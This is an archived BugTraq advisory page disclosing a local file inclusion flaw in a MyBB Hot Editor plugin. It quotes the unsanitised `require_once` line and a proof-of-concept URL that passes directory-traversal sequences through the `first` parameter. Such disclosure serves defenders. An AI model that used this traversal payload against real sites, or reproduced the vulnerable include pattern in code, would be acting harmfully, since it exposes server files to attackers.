BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Mybb Hot Editor Plugin Local File Inclusion Apr 09 2007 01:40PM
liz0 expw0rm com
<?php
/*
Vendor : Liz0ziM
Web : www.expw0rm.com
Mail : liz0 (at) expw0rm (dot) com [email concealed]
---------------------------------------
Vul. Code : keyboard.php line 3

require_once "./vk_code/$first";
----------------------------------------

*/

http://victim.com/[path]/richedit/keyboard.php?first=../../../../.....

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus